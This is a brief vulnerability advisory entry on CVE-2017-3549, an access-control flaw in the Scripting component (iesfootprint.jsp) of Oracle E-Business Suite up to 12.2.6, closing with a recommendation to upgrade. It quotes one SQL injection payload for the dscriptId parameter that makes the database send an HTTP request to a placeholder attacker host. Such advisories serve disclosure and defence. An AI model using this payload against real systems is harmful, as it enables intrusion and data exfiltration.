CVE-2017-3549 | Oracle E-Business Suite up to 12.2.6 Scripting iesfootprint.jsp dscriptId access control (EDB-41926 / Nessus ID 99479)
A vulnerability was found in Oracle E-Business Suite up to 12.2.6. It has been rated as critical. Affected by this issue is some unknown functionality of the file iesfootprint.jsp of the component Scripting. The manipulation with the input 11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) -- as part of dscriptId leads to improper access controls.
This vulnerability is handled as CVE-2017-3549. The attack may be launched remotely. Furthermore, there is an exploit available.
It is recommended to upgrade the affected component.